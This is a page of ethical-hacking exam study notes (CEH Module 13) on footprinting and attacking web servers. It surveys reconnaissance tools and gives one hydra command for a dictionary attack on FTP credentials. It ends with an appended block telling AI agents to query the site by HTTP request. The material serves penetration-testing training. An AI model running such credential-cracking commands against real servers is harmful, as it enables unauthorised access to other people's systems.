# Module 13: Hacking Web Servers

## Overview of Web Server <a href="#overview-of-web-server" id="overview-of-web-server"></a>

Most people think a web server is just hardware, but a web server also includes software applications. In general, a client initiates the communication process through HTTP requests. When a client wants to access any resource such as web pages, photos, or videos, then the client’s browser generates an HTTP request to the web server. Depending on the request, the web server collects the requested information or content from data storage or the application servers and responds to the client’s request with an appropriate HTTP response. If a web server cannot find the requested information, then it generates an error message.

## Lab 1: Footprint the Web Server <a href="#lab-1-footprint-the-web-server" id="lab-1-footprint-the-web-server"></a>

**Overview of Web Server Footprinting**

By performing web server footprinting, it is possible to gather valuable system-level data such as account details, OS, software versions, server names, and database schema details. Use Telnet utility to footprint a web server and gather information such as server name, server type, OSes, and applications running. Use footprinting tools such as Netcraft, ID Serve, and httprecon to perform web server footprinting. Web server footprinting tools such as Netcraft, ID Serve, and httprecon can extract information from the target server. Let us look at the features and the types of information these tools can collect from the target server.

### Task 1: Information Gathering using Ghost Eye <a href="#task-1-information-gathering-using-ghost-eye" id="task-1-information-gathering-using-ghost-eye"></a>

[**`Ghost Eye`**](https://github.com/BullsEye0/ghost_eye) is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP. Ghost Eye can work with any Linux distros if they support Python 3.

Ghost Eye gathers information such as Whois lookup, DNS lookup, EtherApe, Nmap port scan, HTTP header grabber, Clickjacking test, Robots.txt scanner, Link grabber, IP location finder, and traceroute.

### Task 2: Perform Web Server Reconnaissance using Skipfish <a href="#task-2-perform-web-server-reconnaissance-using-skipfish" id="task-2-perform-web-server-reconnaissance-using-skipfish"></a>

Skipfish is an active web application (deployed on a webserver) security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.

### Task 3: Footprint a Web Server using the httprecon Tool <a href="#task-3-footprint-a-web-server-using-the-httprecon-tool" id="task-3-footprint-a-web-server-using-the-httprecon-tool"></a>

Web applications can publish information, interact with Internet users, and establish an e-commerce or e-government presence. However, if an organization is not rigorous in configuring and operating its public website, it may be vulnerable to a variety of security threats. Although the threats in cyberspace remain largely the same as in the physical world (fraud, theft, vandalism, and terrorism), they are far more dangerous. Organizations can face monetary losses, damage to reputation, and legal action if an intruder successfully violates the confidentiality of their data.

**`httprecon`** is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on its target web server.

### Task 4: Footprint a Web Server using ID Serve <a href="#task-4-footprint-a-web-server-using-id-serve" id="task-4-footprint-a-web-server-using-id-serve"></a>

Pen testers must be familiar with banner grabbing techniques to monitor servers and ensure compliance and appropriate security updates. This technique also helps in locating rogue servers or determining the role of servers within a network. This lab manual helps understand and learn the banner grabbing technique using ID Serve, which allows an attacker to determine a remote target system.

### Task 5: Footprint a Web Server using Netcat and Telnet <a href="#task-5-footprint-a-web-server-using-netcat-and-telnet" id="task-5-footprint-a-web-server-using-netcat-and-telnet"></a>

**Netcat**

Netcat is a networking utility that reads and writes data across network connections, using the TCP/IP protocol. It is a reliable “back-end” tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool.

**Telnet**

Telnet is a client-server network protocol. It is widely used on the Internet or LANs. It provides the login session for a user on the Internet. The single terminal attached to another computer emulates with Telnet. The primary security problems with Telnet are the following:

* It does not encrypt any data sent through the connection.
* It lacks an authentication scheme.

Telnet helps users perform banner-grabbing attacks. It probes HTTP servers to determine the Server field in the HTTP response header.

### Task 6: Enumerate Web Server Information using Nmap Scripting Engine (NSE) <a href="#task-6-enumerate-web-server-information-using-nmap-scripting-engine-nse" id="task-6-enumerate-web-server-information-using-nmap-scripting-engine-nse"></a>

Nmap, along with Nmap Scripting Engine, can extract a lot of valuable information from the target web server. In addition to Nmap commands, Nmap Scripting Engine (NSE)provides scripts that reveal various useful information about the target web server to an attacker.

### Task 7: Uniscan Web Server Fingerprinting in Parrot Security <a href="#task-7-uniscan-web-server-fingerprinting-in-parrot-security" id="task-7-uniscan-web-server-fingerprinting-in-parrot-security"></a>

**`Uniscan`** is a versatile server fingerprinting tool that not only performs simple commands like ping, traceroute, and nslookup, but also does static, dynamic, and stress checks on a web server. Apart from scanning websites, uniscan also performs automated Bing and Google searches on provided IPs. Uniscan takes all of this data and combines them into a comprehensive report file for the user.

## Lab 2: Perform a Web Server Attack <a href="#lab-2-perform-a-web-server-attack" id="lab-2-perform-a-web-server-attack"></a>

**Overview of Web Server Attack**

Attackers can cause various kinds of damage to an organization by attacking a web server, including:

* Compromise of a user account
* Secondary attacks from the website and website defacement
* Root access to other applications or servers
* Data tampering and data theft
* Damage to the company’s reputation

### Task 1: Crack FTP Credentials using a Dictionary Attack <a href="#task-1-crack-ftp-credentials-using-a-dictionary-attack" id="task-1-crack-ftp-credentials-using-a-dictionary-attack"></a>

A dictionary or wordlist contains thousands of words that are used by password cracking tools to break into a password-protected system. An attacker may either manually crack a password by guessing it or use automated tools and techniques such as the dictionary method. Most password cracking techniques are successful, because of weak or easily guessable passwords.

{% code overflow="wrap" %}

```bash
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://[IP Address]
```

{% endcode %}

> Hydra tries various combinations of usernames and passwords (present in the **Usernames.txt** and **Passwords.txt** files) on the FTP server and outputs cracked usernames and passwords, as shown in the screenshot.

***

***

***

**`Hacker's Mantra:`**`Access is God. - Anh Konge`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/certified-ethical-hacker-v12-practical-notes/module-13-hacking-web-servers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.